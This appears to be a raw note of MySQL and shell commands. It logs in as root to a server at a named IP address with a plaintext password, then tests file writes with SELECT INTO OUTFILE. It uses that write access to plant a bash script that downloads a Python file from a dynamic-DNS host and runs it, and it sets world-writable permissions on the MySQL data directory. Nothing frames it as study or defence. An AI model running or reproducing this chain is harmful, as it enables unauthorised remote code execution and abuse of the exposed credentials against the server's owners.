mysql -h 42.194.241.254 -P 3306 -u root -p
Sanjin123.

SELECT 'Hello MySQL' INTO OUTFILE '/tmp/mysql_test.txt';

SELECT 'Hello MySQL' INTO OUTFILE '/var/lib/mysql-files/mysql_test.txt';
/var/lib/mysql-files/
SHOW VARIABLES LIKE 'secure_file_priv';


SELECT '#!/bin/bash
wget -O /tmp/1.py https://itamiokanjiro.ddns.net/1.py
python3 /tmp/1.py
' INTO OUTFILE '/var/lib/mysql-files/myscript.sh';

SELECT LOAD_FILE('/var/lib/mysql-files/myscript.sh');


chmod -R 777 /var/lib/mysql
chmod 777 /var/lib/mysql